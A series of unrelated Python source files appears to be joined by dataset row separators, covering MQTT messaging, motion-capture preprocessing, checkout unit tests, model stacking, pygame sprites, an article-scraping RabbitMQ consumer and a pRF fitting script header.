    """Log callback: echo every paho-mqtt log line to stdout."""
    print(string)
mqttc = paho.Client()
# Assign event callbacks
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# Connect to clearblade
# The user token doubles as the MQTT username, the system key as password.
mqttc.username_pw_set(userClient.UserToken, userClient.systemKey)
msgAddr = urlparse(userClient.platform)
msgAddr = msgAddr.hostname
# NOTE(review): the port is passed as the string "1883" — paho's connect()
# expects an int; confirm this works with the installed paho version.
mqttc.connect(msgAddr, "1883", 30)
# Start subscribe, with QoS level 0
mqttc.subscribe("motor/angle", 0)
# Continue the network loop, exit when an error occurs
rc = 0
while rc == 0:
    rc = mqttc.loop()
|
6,315 | 2c58a9e83f80d437160b87ec64c7631e7a35bf90 | import os, pickle, logging, numpy as np
from .. import utils as U
class CMU_Generator():
    """Preprocess the CMU mocap dataset: read raw sequences, normalize them,
    and pickle the train/eval splits plus the normalization statistics."""

    def __init__(self, args, dataset_args):
        self.in_path = dataset_args['cmu_data_path']
        self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)
        # Action categories expected as subdirectories of the raw data.
        self.actions = ['walking', 'running', 'directing_traffic', 'soccer',
                        'basketball', 'washwindow', 'jumping', 'basketball_signal']
        # Feature dimensions excluded from the model input
        # (out of 39 joints x 3 values = 117 raw dims).
        self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, 26,
                           39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83,
                           87, 88, 89, 90, 91, 92, 108, 109, 110, 114, 115, 116]
        self.dim_use = list(set(range(39*3)).difference(set(self.dim_ignore)))
        U.create_folder(self.out_path)

    def start(self):
        """Run the full pipeline and write the three pickle files."""
        logging.info('Reading data ...')
        self.all_train_data, train_data = self.read_data('train')
        _, eval_data = self.read_data('test')
        logging.info('Normalizing data ...')
        self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = self.normalize_state()
        train_data = self.normalize_data(train_data)
        eval_data = self.normalize_data(eval_data)
        logging.info('Saving data ...')
        with open('{}/data.pkl'.format(self.out_path), 'wb') as f:
            pickle.dump((train_data, eval_data, self.actions), f)
        with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:
            pickle.dump((self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero), f)
        with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:
            pickle.dump((self.dim_use, self.dim_ignore), f)

    def read_data(self, phase):
        """Read every comma-separated sequence file for `phase`.

        Returns:
            (all_frames, even_data): all frames concatenated along axis 0
            (used for computing statistics), and a dict keyed by
            (action_idx, sequence_idx) holding every other frame of each
            sequence (2x temporal downsampling).
        """
        all_data, even_data = [], {}
        for action_idx, action in enumerate(self.actions):
            action_path = '{}/{}/{}'.format(self.in_path, phase, action)
            for sequence_idx, file in enumerate(os.listdir(action_path)):
                sequence = []
                with open('{}/{}'.format(action_path, file), 'r') as f:
                    for line in f.readlines():
                        line = line.strip().split(',')
                        if len(line) > 0:
                            sequence.append(np.array([np.float32(x) for x in line]))
                sequence = np.array(sequence)
                all_data.append(sequence)
                even_data[(action_idx, sequence_idx)] = sequence[range(0,sequence.shape[0],2),:]
        return np.concatenate(all_data, axis=0), even_data

    def normalize_state(self):
        """Compute per-dimension mean/std over all training frames.

        Dimensions with (near-)zero variance get std 1.0 so that the later
        division is a no-op for them.
        """
        data_mean = np.mean(self.all_train_data, axis=0)
        data_std = np.std(self.all_train_data, axis=0)
        dim_zero = list(np.where(data_std < 0.0001)[0])
        dim_nonzero = list(np.where(data_std >= 0.0001)[0])
        data_std[dim_zero] = 1.0
        return data_mean, data_std, dim_zero, dim_nonzero

    def normalize_data(self, data):
        """Standardize each sequence and keep only the used dimensions."""
        for key in data.keys():
            data[key] = np.divide((data[key] - self.data_mean), self.data_std)
            data[key] = data[key][:, self.dim_use]
        return data
|
6,316 | fc2a123f8a86d149af9fc73baa360a029fcde574 |
""" Unit test for the Supermarket checkout exercise """
import unittest
from decimal import *
from ShoppingCart import *
# Unit tests -----
class ScannerTests(unittest.TestCase):
    """Tests for Scanner: item counting and discounted price calculation."""

    def setUp(self):
        # Pricing rules map item -> {quantity: price-for-that-quantity}.
        pricingRulesWithSingleDiscount = { 'Apple': { 1 : '0.50' , 3 : '1.30' },
                                           'Orange': {1 : '0.20'},
                                           'Tomato': {1 : '1.25'},
                                           'Cucumber': {1 : '0.10'}
                                           }
        pricingRulesWithMultipleDiscounts = { 'Apple': { 1 : '0.50' , 3 : '1.30' , 5 : '2.00' },
                                              'Orange': {1 : '0.20' , 4 : '.60'},
                                              'Tomato': {1 : '1.25' , 2 : '.62', 5 : '2.50', 10 : '2.00'},
                                              'Cucumber': {1 : '0.10'}
                                              }
        self.singleItemListOneDiscount = createInventoryList(pricingRulesWithSingleDiscount)
        self.multipleDiscountsItemList = createInventoryList(pricingRulesWithMultipleDiscounts)

    def testScaningItems(self):
        """Scanning should tally the per-item quantities."""
        scanner = Scanner(self.singleItemListOneDiscount)
        groceryList = ['Apple','Orange','Tomato', 'Apple', 'Orange','Cucumber']
        scanner.scanItems(groceryList)
        # Bug fix: self.failIf() is a deprecated unittest alias that was
        # removed in Python 3.12 — replaced with assertEqual throughout.
        self.assertEqual(self.singleItemListOneDiscount['Apple'].numberOfItems, 2)
        self.assertEqual(self.singleItemListOneDiscount['Orange'].numberOfItems, 2)
        self.assertEqual(self.singleItemListOneDiscount['Tomato'].numberOfItems, 1)
        self.assertEqual(self.singleItemListOneDiscount['Cucumber'].numberOfItems, 1)

    def testPricingZeroItems(self):
        """An empty grocery list costs exactly zero."""
        scanner = Scanner(self.singleItemListOneDiscount)
        emptyGroceryList = []
        scanner.scanItems(emptyGroceryList)
        self.assertEqual(Decimal("0"), scanner.totalPrice())

    def testPricingSingleItems(self):
        """Quantities below any discount threshold use the unit price."""
        scanner = Scanner(self.singleItemListOneDiscount)
        groceryList = ['Apple','Orange','Tomato', 'Apple', 'Orange','Cucumber']
        scanner.scanItems(groceryList)
        self.assertEqual(self.singleItemListOneDiscount['Apple'].finalCost(), Decimal('1.00'))
        self.assertEqual(self.singleItemListOneDiscount['Orange'].finalCost(), Decimal('0.40'))
        self.assertEqual(self.singleItemListOneDiscount['Tomato'].finalCost(), Decimal('1.25'))
        self.assertEqual(self.singleItemListOneDiscount['Cucumber'].finalCost(), Decimal('0.10'))
        self.assertEqual(Decimal("2.75"), scanner.totalPrice())

    def testPricingSingleItemsWithExactDiscount(self):
        """Quantities matching a discount threshold use the discount price."""
        scanner = Scanner(self.singleItemListOneDiscount)
        groceryList = ['Apple','Orange','Orange', 'Apple', 'Orange','Apple']
        scanner.scanItems(groceryList)
        self.assertEqual(self.singleItemListOneDiscount['Apple'].finalCost(), Decimal('1.30'))
        self.assertEqual(self.singleItemListOneDiscount['Orange'].finalCost(), Decimal('0.60'))
        self.assertEqual(Decimal("1.90"), scanner.totalPrice())

    def testPricingMultipleItemsBeyondDiscounts(self):
        """Quantities past a threshold mix discount and unit prices."""
        scanner = Scanner(self.singleItemListOneDiscount)
        groceryList = ['Apple','Tomato','Cucumber','Apple','Cucumber','Apple','Apple']
        scanner.scanItems(groceryList)
        self.assertEqual(self.singleItemListOneDiscount['Apple'].finalCost(), Decimal('1.80'))
        self.assertEqual(self.singleItemListOneDiscount['Tomato'].finalCost(), Decimal('1.25'))
        self.assertEqual(self.singleItemListOneDiscount['Cucumber'].finalCost(), Decimal('0.20'))
        self.assertEqual(Decimal("3.25"), scanner.totalPrice())

    def testPricingMultipleItemsWithMultipleDiscounts(self):
        """Several discount tiers combine to the best applicable price."""
        scanner = Scanner(self.multipleDiscountsItemList)
        groceryList = ['Orange','Apple','Tomato','Orange','Tomato','Cucumber','Tomato','Tomato','Tomato',
                       'Apple','Cucumber','Apple','Tomato','Tomato','Apple','Tomato','Orange','Apple',
                       'Orange','Apple','Apple','Orange','Apple','Apple']
        scanner.scanItems(groceryList)
        self.assertEqual(self.multipleDiscountsItemList['Apple'].finalCost(), Decimal('3.80'))
        self.assertEqual(self.multipleDiscountsItemList['Tomato'].finalCost(), Decimal('4.37'))
        self.assertEqual(self.multipleDiscountsItemList['Orange'].finalCost(), Decimal('0.80'))
        self.assertEqual(self.multipleDiscountsItemList['Cucumber'].finalCost(), Decimal('0.20'))
        self.assertEqual(Decimal("9.17"), scanner.totalPrice())

    def testPricingMultipleItemsWithMultipleDiscountsOneExact(self):
        """A quantity exactly hitting the largest tier uses that tier alone."""
        scanner = Scanner(self.multipleDiscountsItemList)
        groceryList = ['Orange','Apple','Tomato','Orange','Tomato','Cucumber','Tomato','Tomato','Tomato',
                       'Apple','Cucumber','Apple','Tomato','Tomato','Apple','Tomato','Orange','Apple',
                       'Orange','Apple','Apple','Orange','Apple','Apple','Tomato','Tomato']
        scanner.scanItems(groceryList)
        self.assertEqual(self.multipleDiscountsItemList['Apple'].finalCost(), Decimal('3.80'))
        self.assertEqual(self.multipleDiscountsItemList['Tomato'].finalCost(), Decimal('2.00'))
        self.assertEqual(self.multipleDiscountsItemList['Orange'].finalCost(), Decimal('0.80'))
        self.assertEqual(self.multipleDiscountsItemList['Cucumber'].finalCost(), Decimal('0.20'))
        self.assertEqual(Decimal("6.80"), scanner.totalPrice())
class CheckoutTests(unittest.TestCase):
    """Checks that scanning a grocery list tallies per-item counts correctly."""

    def setUp(self):
        # Single-unit prices plus one multi-buy discount (3 Apples for 1.30).
        pricingRulesWithSingleDiscount = { 'Apple': { 1 : '0.50' , 3 : '1.30' },
                           'Orange': {1 : '0.20'},
                           'Tomato': {1 : '1.25'},
                           'Cucumber': {1 : '0.10'}
                         }
        self.itemList = createInventoryList(pricingRulesWithSingleDiscount)

    def testCheckout(self):
        scanner = Scanner(self.itemList)
        groceryList = ['Apple','Orange','Tomato', 'Apple', 'Orange','Cucumber']
        scanner.scanItems(groceryList)
        # failIf() was removed in Python 3.12; assertEqual also reports the
        # actual count on failure instead of a bare boolean.
        self.assertEqual(2, self.itemList['Apple'].numberOfItems)
        self.assertEqual(2, self.itemList['Orange'].numberOfItems)
        self.assertEqual(1, self.itemList['Tomato'].numberOfItems)
        self.assertEqual(1, self.itemList['Cucumber'].numberOfItems)
|
6,317 | 23f0ba622097eb4065337ea77ea8104a610d6857 | import os
import sys
sys.path.append("..")
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.metrics import accuracy_score
import config
from mikasa.common import timer
from mikasa.io import load_pickle, dump_pickle, load_feature
from mikasa.trainer.gbdt import LGBMTrainer
from mikasa.trainer.base import SklearnRegressionTrainer
from mikasa.trainer.cross_validation import RSACVTrainer
from mikasa.ensemble import SimpleAgerageEnsember
from mikasa.plot import plot_importance
from mikasa.mlflow_writer import MlflowWriter
def run_train(model_name, base_trainer, X, y):
    """Fit *base_trainer* under seed-averaged stratified 3-fold CV.

    Persists the fitted fold models to disk and returns the fitted
    cross-validation trainer together with its out-of-fold accuracy.
    """
    splitter = StratifiedKFold(n_splits=3, shuffle=True, random_state=config.SEED)
    cv_trainer = RSACVTrainer(splitter, base_trainer)
    cv_trainer.fit(X=X, y=y, random_state=config.SEED, num_seed=config.NUM_SEED)
    # Persist every fold/seed model for later ensembling.
    dump_pickle(cv_trainer.get_model(), f"../data/titanic/model/{model_name}_models.pkl")
    # Out-of-fold probabilities -> hard labels at the 0.5 threshold.
    hard_oof = np.where(cv_trainer.get_cv_oof() > 0.5, 1, 0)
    metric = accuracy_score(cv_trainer.get_cv_targets(), hard_oof)
    return cv_trainer, metric
def eval_single_model(trainer, data, target):
    """Score *trainer* on held-out data via simple seed-averaged prediction."""
    seed_preds = np.array(trainer.predict(data)).T
    averaged = SimpleAgerageEnsember().predict(seed_preds)
    hard_labels = np.where(averaged > 0.5, 1, 0)
    return accuracy_score(target, hard_labels)
def save_importance(model_name, trainer):
    """Render the trainer's mean/std feature importance and save it as a PNG."""
    names, means, stds = trainer.get_importance()
    figure = plot_importance(names, means, stds)
    figure.savefig(f"../data/titanic/working/{model_name}_importance.png")
def main():
    """Train CV base models on Titanic features, stack them, and log results."""
    # Load data.
    src_dir = "../data/titanic/feature/"
    feature_files = config.FeatureList.features
    # BUG FIX: the comprehension ignored its loop variable and repeated a
    # single literal path; build one pickle path per configured feature name.
    feature_files = [
        os.path.join(src_dir, f"{filename}.pkl") for filename in feature_files
    ]
    X = load_feature(feature_files)
    y = load_pickle(os.path.join(src_dir, "target.pkl"))
    print(X.head())
    print(y.head())
    # Hold out 20% of the rows for ensemble evaluation.
    X_train, X_eval, y_train, y_eval = train_test_split(
        X, y, test_size=0.2, random_state=config.SEED, stratify=y
    )
    cv_metrics = {}
    eval_metrics = {}
    # Train each base model under cross-validation.
    base_trainers = {
        "LGBM": LGBMTrainer(
            config.LightgbmParams.params, config.LightgbmParams.train_params
        ),
    }
    fit_trainers = {}
    for model_name, base_trainer in base_trainers.items():
        trainer, metric = run_train(model_name, base_trainer, X_train, y_train)
        fit_trainers[model_name] = trainer
        cv_metrics[model_name] = metric
        eval_metrics[model_name] = eval_single_model(trainer, X_eval, y_eval)
        save_importance(model_name, trainer)
    # Stacking: ridge regression on the base models' hold-out predictions.
    pred_first = []
    for model_name, _trainer in fit_trainers.items():
        pred_first.append(np.array(_trainer.predict(X_eval)).T)
    pred_first = np.concatenate(pred_first, axis=1)
    pred_first = pd.DataFrame(pred_first)
    base_trainer = SklearnRegressionTrainer(model=Ridge(random_state=config.SEED))
    trainer, metric = run_train("stack_ridge", base_trainer, pred_first, y_eval)
    eval_metrics["Stack"] = metric
    # Report metrics.
    for model_name, metric in cv_metrics.items():
        print(f"{model_name:>8} CV Metric: {metric:.08f}")
    for model_name, metric in eval_metrics.items():
        print(f"{model_name:>8} Eval Metric: {metric:.08f}")
    # Dump logs to mlflow.
    if config.DEBUG is not True:
        writer = MlflowWriter(
            config.MLflowConfig.experiment_name,
            tracking_uri=os.path.abspath("../mlruns"),
        )
        writer.set_run_name(config.MLflowConfig.run_name)
        writer.set_note_content(config.MLflowConfig.experiment_note)
        # Features
        writer.log_param("Feature", ", ".join(config.FeatureList.features))
        # Parameters
        writer.log_param("SEED", config.SEED)
        writer.log_param("NUM_SEED", config.NUM_SEED)
        writer.log_param(
            "LGBM_params",
            {
                "params": config.LightgbmParams.params,
                "train_params": config.LightgbmParams.train_params,
            },
        )
        # Metric
        for model_name, _metric in cv_metrics.items():
            writer.log_metric(f"{model_name} CV Metric", _metric)
        for model_name, _metric in eval_metrics.items():
            writer.log_metric(f"{model_name} Eval Metric", _metric)
        # Close writer client.
        writer.set_terminated()
if __name__ == "__main__":
with timer("Train Processing"):
main()
|
6,318 | 080aa8b99cdded7a947880a1c3399f68b28ae44d | """
Sprites - animations for objects.
"""
import config
import os
import pygame
class Sheet(object):
    """ An single large image composed of smaller images used for sprite
    animations. All the sprites on the sheet must be the same size. The width x
    height give the sprite dimensions in pixels. The rows x columns give the
    sheet dimensions in images. """
    def __init__(self, width, height, rows, columns, filename):
        self.rows = rows
        self.columns = columns
        self.width = width
        self.height = height
        path = os.path.join(config.SPRITE_DIRECTORY, filename)
        # BUG FIX: convert_alpha() returns a converted *copy*; the original
        # discarded it, leaving the loaded surface unconverted.
        self.surface = pygame.image.load(path).convert_alpha()
    def get_image(self, index):
        """ Return the sub-image at *index*, counting row-major across the sheet. """
        x = (index % self.columns) * self.width
        # BUG FIX: '/' is true division in Python 3 and produced a float row
        # offset; floor division gives the intended integer pixel coordinate.
        y = (index // self.columns) * self.height
        rect = pygame.Rect(x, y, self.width, self.height)
        return self.surface.subsurface(rect)
class Sprite(object):
    """ Base class for anything drawable from a sprite sheet.

    Width and height are delegated to the underlying sheet, since every
    image on a sheet shares the same dimensions. """

    def __init__(self, sheet):
        self.sheet = sheet

    @property
    def width(self):
        """ The width in pixels. """
        return self.sheet.width

    @property
    def height(self):
        """ The height in pixels. """
        return self.sheet.height
class CompositeSprite(Sprite):
    """ A sprite that is composed of multiples sprites layered on top of each
    other. The first sprite goes on the bottom, the next above that, and so
    on. The sprites should all be the same size (the first sprite sets the
    size; they will all be anchored to the top left corner)."""
    def __init__(self, sprites):
        # Size and sheet come from the bottom-most sprite.
        super(CompositeSprite, self).__init__(sprites[0].sheet)
        self.sprites = sprites
        # NOTE(review): this Surface is created without pygame.SRCALPHA, so
        # the (0, 0, 0, 0) fill in get_image() ignores the alpha component --
        # confirm whether per-pixel transparency was intended here.
        self.surface = pygame.Surface((self.width, self.height))
        # NOTE(review): convert_alpha() returns a converted *copy*; its
        # result is discarded, so this call has no effect as written.
        self.surface.convert_alpha()
    def get_image(self, frame):
        """ Return the layered image for the given animation frame number. """
        # Clear the scratch surface, then blit each layer bottom-to-top at
        # the shared top-left origin.
        self.surface.fill((0, 0, 0, 0))
        for sprite in self.sprites:
            self.surface.blit(sprite.get_image(frame), (0, 0))
        return self.surface
class AnimatedSprite(Sprite):
    """ The animation for an object. Each sprite refers to a sheet, a starting
    image and a number of sequential animation images. The facings bitmask
    indicates the number and type of facings which the sprite supports. The
    sprite's frames attribute is the image sequence."""
    # XXX: facings not handled yet
    def __init__(self, sheet, num_frames, start_frame, facings=0):
        super(AnimatedSprite, self).__init__(sheet)
        self.num_frames = num_frames
        self.facings = facings
        self.frames = []
        # Pre-extract the animation images from consecutive sheet cells.
        for frame in range(num_frames):
            index = start_frame + frame
            self.frames.append(sheet.get_image(index))
    def get_image(self, frame):
        """ Return the image for the given animation frame number. """
        # Convert the global frame counter to elapsed milliseconds, then
        # advance one animation image every 250 ms, wrapping at the end.
        msec = frame * config.MS_PER_FRAME
        frame = msec // 250
        return self.frames[frame % self.num_frames]
class WaveSprite(Sprite):
    """ A sprite with a single frame that animates by "rolling". """
    def __init__(self, sheet, frame):
        super(WaveSprite, self).__init__(sheet)
        # One animation step per pixel row of the image.
        self.num_frames = self.height
        # pygame's surface scroll *almost* does what I want, but it doesn't
        # wrap. So I double the image and scroll up the double.
        self.double = pygame.Surface((self.width, self.height * 2))
        # NOTE(review): convert_alpha() returns a converted *copy*; its
        # result is discarded, so this call has no effect as written.
        self.double.convert_alpha()
        image = sheet.get_image(frame)
        self.double.blit(image, (0, 0))
        self.double.blit(image, (0, self.height))
    def get_image(self, frame):
        """ Return the image for the given animation frame number. """
        # Slide a sprite-sized window up the doubled image: one pixel of
        # scroll every 100 ms, wrapping once per full image height.
        rect = pygame.Rect(0, 0, self.width, self.height)
        msec = frame * config.MS_PER_FRAME
        frame = msec // 100
        rect.y = self.height - (frame % self.height)
        return self.double.subsurface(rect)
class Fade(object):
    """ A shaded semi-transparent surface (black at 50% alpha). """
    def __init__(self, width, height):
        shade = pygame.Surface((width, height), flags=pygame.SRCALPHA)
        shade.convert_alpha()
        shade.fill(pygame.Color(0, 0, 0, 128))
        self.surf = shade
|
6,319 | cd1d8a73b6958775a212d80b50de74f4b4de18bf | import requests
from lxml import etree
from pymongo import MongoClient
from lib.rabbitmq import Rabbit
from lib.log import LogHandler
from lib.proxy_iterator import Proxies
import yaml
import json
import datetime
import re
import time
setting = yaml.load(open('config_local.yaml'))
log = LogHandler('article_consumer')
m = MongoClient(setting['mongo_config']['config_host'], setting['mongo_config']['port'])
m.admin.authenticate(setting['mongo_config']['user_name'],setting['mongo_config']['password'] )
collection = m[setting['mongo_config']['config_db']][setting['mongo_config']['coll_detail']]
clean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config']['clean']]
rabbit = Rabbit(setting['rabbitmq_host'],setting['rabbitmq_port'])
connection = rabbit.connection
class CrawlerDetail:
    """RabbitMQ consumer that downloads article detail pages, extracts the
    per-source configured fields, cleans them, and republishes the enriched
    article for the body-cleaning stage."""

    def __init__(self):
        # Rotating proxy iterator; each request uses the next proxy.
        self.proxy = Proxies()

    def start_consume(self):
        """Block and consume article URLs from the 'usual_article' queue."""
        channel = connection.channel()
        channel.queue_declare(queue='usual_article')
        # Hand this consumer only one unacked message at a time so a slow
        # parse does not hoard the queue.
        channel.basic_qos(prefetch_count=1)
        channel.basic_consume(self.consume_article_detail_url,
                              queue='usual_article',
                              no_ack=False)
        channel.start_consuming()

    def clean(self, message):
        """Clean the author, post-time and detailed-source fields.

        Applies the per-source regexes stored in the clean collection;
        fields that fail to match are reset to None. The message dict is
        modified in place and also returned.
        """
        clean = clean_coll.find_one({'source': message['source']})
        if clean['post_time'] is not None:
            try:
                post_time = re.search(clean['post_time'], message['post_time'], re.S | re.M).group(1)
                message['post_time'] = post_time
            except Exception:
                log.info("post_time清洗失败{}".format(message['post_time']))
                message['post_time'] = None
        if clean['author'] is not None:
            try:
                author = re.search(clean['author'], message['author']).group(1)
                message['author'] = author
            except Exception:
                log.info("author清洗失败{}".format(message['author']))
                message['author'] = None
        if clean['source_detail'] is not None:
            try:
                source_detail = re.search(clean['source_detail'], message['source_detail'], re.S | re.M).group(1)
                message['source_detail'] = source_detail
            except Exception:
                log.info("source_detail清洗失败{}".format(message['source_detail']))
                message['source_detail'] = None
        return message

    def consume_article_detail_url(self, ch, method, properties, body):
        """Parse one article detail page and forward it for body cleaning.

        Args:
            ch, method, properties, body: standard pika consumer arguments;
                *body* is a JSON-encoded message holding at least
                'detail_url' and 'source'.
        """
        message = json.loads(body.decode())
        html = None
        # Retry the download up to 10 times through rotating proxies.
        for _ in range(10):
            try:
                html = requests.get(message['detail_url'], timeout=10, proxies=next(self.proxy))
                connection.process_data_events()
                if html.status_code == 200:
                    break
            except Exception:
                # Keep the RabbitMQ connection heartbeat alive while retrying.
                connection.process_data_events()
        else:
            # BUG FIX: the original tested `i == 10`, which range(10) never
            # yields, so total failure was silently ignored, `html` could be
            # used while unbound, and processing continued without a return.
            log.error("请求文章详情页{}失败".format(message['detail_url']))
            ch.basic_ack(delivery_tag=method.delivery_tag)
            return
        try:
            con = html.content.decode()
        except UnicodeDecodeError:
            try:
                con = html.content.decode('gbk')
            except UnicodeDecodeError:
                log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
                ch.basic_ack(delivery_tag=method.delivery_tag)
                return
        page = etree.HTML(con)
        # Per-source XPath configuration for the detail page.
        detail_config_dict = collection.find_one({'source': message['source']})
        if detail_config_dict['body'] is not None:
            try:
                # Try each configured body pattern until one matches.
                for pattern in detail_config_dict['body']:
                    if page.xpath(pattern):
                        article_body = page.xpath(pattern)[0]
                        message['body'] = etree.tounicode(article_body)
                        break
            except Exception:
                log.error('xpath语句未能解析body')
                ch.basic_ack(delivery_tag=method.delivery_tag)
                return
        if detail_config_dict['comment_count'] is not None:
            message['comment_count'] = page.xpath(detail_config_dict['comment_count'])[0]
        if detail_config_dict['like_count'] is not None:
            message['like_count'] = page.xpath(detail_config_dict['like_count'])[0]
        if detail_config_dict['read_num'] is not None:
            message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
        if detail_config_dict['author'] is not None:
            try:
                message['author'] = page.xpath(detail_config_dict['author'])[0]
            except Exception:
                log.info("没有提取到{}作者字段".format(message['detail_url']))
        if detail_config_dict['post_time'] is not None:
            try:
                message['post_time'] = page.xpath(detail_config_dict['post_time'])[0]
            except Exception:
                log.info("没有提取到{}文章发表时间".format(message['detail_url']))
        if detail_config_dict['tag'] is not None:
            message['tag'] = page.xpath(detail_config_dict['tag'])[0]
        if detail_config_dict['source_detail'] is not None:
            try:
                message['source_detail'] = page.xpath(detail_config_dict['source_detail'])[0]
            except Exception:
                log.info("没有提取到{}文章详细来源".format(message['detail_url']))
        self.clean(message)
        # Publish to the body-replacement/cleaning queue.
        produce_channel = connection.channel()
        produce_channel.queue_declare('article_body')
        article_text = json.dumps(message)
        produce_channel.basic_publish(exchange='',
                                      routing_key='article_body',
                                      body=article_text)
        log.info('{}已经放入清洗队列'.format(message['title']))
        ch.basic_ack(delivery_tag=method.delivery_tag)
        produce_channel.close()
6,320 | f3eed00a58491f36778b3a710d2f46be093d6eda | from migen import *
from migen.fhdl import verilog
class Alignment_Corrector(Module):
    """Realigns a 32-bit stream that arrives half-word out of phase.

    After *aligned* is asserted, each output word is built from the
    previously latched upper half-word and the current lower half-word,
    so *dout* presents realigned 32-bit words one cycle later.
    """
    def __init__(self):
        # din: raw 32-bit input word (assumed 16 bits out of alignment).
        self.din=din=Signal(32)
        # aligned: strobe that starts the correction process.
        self.aligned=aligned=Signal()
        # dout: realigned 32-bit output word.
        self.dout=dout=Signal(32)
        # correction_done: set once the first half-word has been captured.
        self.correction_done=Signal()
        # # #
        first_half=Signal(16)
        first_half1=Signal(16)  # NOTE(review): declared but never used
        second_half=Signal(16)  # NOTE(review): declared but never used
        self.submodules.fsm=FSM(reset_state="IDLE")
        # Wait for the alignment strobe.
        self.fsm.act("IDLE",
            If(aligned,
                NextState("INIT"),
            )
        )
        # Latch the first upper half-word and flag that correction is active.
        self.fsm.act("INIT",
            NextState("DONE"),
            NextValue(first_half,din[16:]),
            NextValue(self.correction_done,1)
        )
        # Steady state: Cat() packs first_half as the low bits and the
        # current lower half-word as the high bits; keep re-latching the
        # current upper half-word for the next cycle.
        self.fsm.act("DONE",
            dout.eq(Cat(first_half,din[:16])),
            NextValue(first_half,din[16:]),
            NextState("DONE")
        )
#example = Alignment_Corrector()
#verilog.convert(example, {example.din, example.dout, example.aligned, example.correction_done}).write("alignment_corrector.v")
"""
def tb(dut):
yield
for i in range(10):
yield dut.din.eq(0x62cfa9d274)
yield dut.aligned.eq(1)
yield
yield dut.din.eq(0x9d30562d8b)
yield
dut=Alignment_Corrector()
run_simulation(dut,tb(dut),vcd_name="alignment_tb.vcd")
"""
|
6,321 | 45f0a7a78184195a593061d863ff2114abe01a46 | """
ConstantsCommands.py
"""
TEST_HEAD = "\n >>>>>> " \
"\n >>>>>> Test in progress: {0}" \
"\n >>>>>>"
TEST_TAIL = ">>>>>> Test execution done, tearDown\n\r"
|
6,322 | 516d9790f40c021d45302948b7fba0cf3e00da0a | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 15 10:28:04 2020
@author: Maxi
"""
import numpy as np
from ase.io import read
from RDF_3D import pairCorrelationFunction_3D
import matplotlib.pyplot as plt
# Load the crystal structure, then compute and plot its 3D radial
# distribution function g(r).
structure_file = r"C:\Users\Maxi\Desktop\t\Ag_HfO2_cat_3.125_222_t.cif"
crystal = read(structure_file)
positions = crystal.get_positions()
cell_params = crystal.get_cell_lengths_and_angles()
cell_lengths = cell_params[0:3]  # keep only the a, b, c lengths, drop angles
dr = 0.01  # spherical shell thickness for the RDF histogram
shortest_edge = min(cell_lengths)
rmax = shortest_edge / 10
# Split the (N, 3) coordinate array into x, y, z columns.
x = positions[:, 0]
y = positions[:, 1]
z = positions[:, 2]
g_r, r, ref_ind = pairCorrelationFunction_3D(x, y, z, shortest_edge, rmax, dr)
plt.figure()
plt.plot(r, g_r, color='black')
plt.xlabel('r')
plt.ylabel('g(r)')
plt.xlim((0, rmax))
plt.ylim((0, 1.05 * g_r.max()))
plt.show()
|
6,323 | ccf9c389a65d1420e87deec2100e37bccdcb5539 | #encoding:utf-8
from flask import Flask
import config
from flask_rabbitmq import Queue, RabbitMQ
app = Flask(__name__)
app.config.from_object(config)
queue = Queue()
mq = RabbitMQ(app, queue)
from app import demo
|
6,324 | 59376f6565cd72e20087609253a41c04c6327a27 | # encoding:UTF-8
# 题目:斐波那契数列。
def fib(n):
    """Return the n-th Fibonacci number (1-indexed: fib(1) == fib(2) == 1).

    Iterative implementation: the original double recursion is O(phi**n)
    and also recursed forever for n < 1.

    Raises:
        ValueError: if n is less than 1.
    """
    if n < 1:
        raise ValueError("n must be a positive integer")
    a, b = 1, 1
    for _ in range(n - 2):
        a, b = b, a + b
    return b
|
6,325 | 5723e7889663142832a8131bb5f4c35d29692a49 | from . import *
from rest_framework import permissions
from core.serializers import CategorySerializer
from core.models.category_model import Category
class CategoryViewSet(viewsets.ModelViewSet):
    """CRUD endpoints for Category objects, open to any caller."""

    queryset = Category.objects.all()
    serializer_class = CategorySerializer

    def get_permissions(self):
        """Allow unauthenticated access to every action."""
        return [permissions.AllowAny()]
|
6,326 | 7a2ac3a3a2bbd7349e8cc62b4d357394d9600cc8 |
#! /usr/bin/env python
def get_case(str_arg):
    """Echo *str_arg* via the helper, then print the literal 'small_hand'."""
    first_life_and_work(str_arg)
    print('small_hand')
def first_life_and_work(str_arg):
    """Print the given argument to stdout."""
    print(str_arg)
if __name__ == '__main__':
get_case('thing')
|
6,327 | d9156e240d49e0a6570a5bc2315f95a7a670fd4f |
#####
# Created on Oct 15 13:13:11 2019
#
# @author: inesverissimo
#
# Do pRF fit on median run, make iterative fit and save outputs
####
import os
# issue with tensorflow, try this suggestion
#NUM_PARALLEL_EXEC_UNITS = 16
#os.environ['OMP_NUM_THREADS'] = str(NUM_PARALLEL_EXEC_UNITS)
#os.environ["KMP_AFFINITY"] = "granularity=fine,verbose,compact,1,0"
##
import json
import sys
import glob
import re
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import numpy as np
import scipy as sp
import scipy.stats as stats
import nibabel as nb
from nilearn.image import mean_img
from nilearn import surface
from utils import * # import script to use relevant functions
# requires pfpy be installed - preferably with python setup.py develop
from prfpy.rf import *
from prfpy.timecourse import *
from prfpy.stimulus import PRFStimulus2D
from prfpy.grid import Iso2DGaussianGridder
from prfpy.fit import Iso2DGaussianFitter
from popeye import utilities
# define participant number and open json parameter file
if len(sys.argv) < 2:
raise NameError('Please add subject number (ex:1) '
'as 1st argument in the command line!')
elif len(sys.argv) < 3:
raise NameError('Please select server being used (ex: aeneas or cartesius) '
'as 2nd argument in the command line!')
else:
# fill subject number with 0 in case user forgets
sj = str(sys.argv[1]).zfill(2)
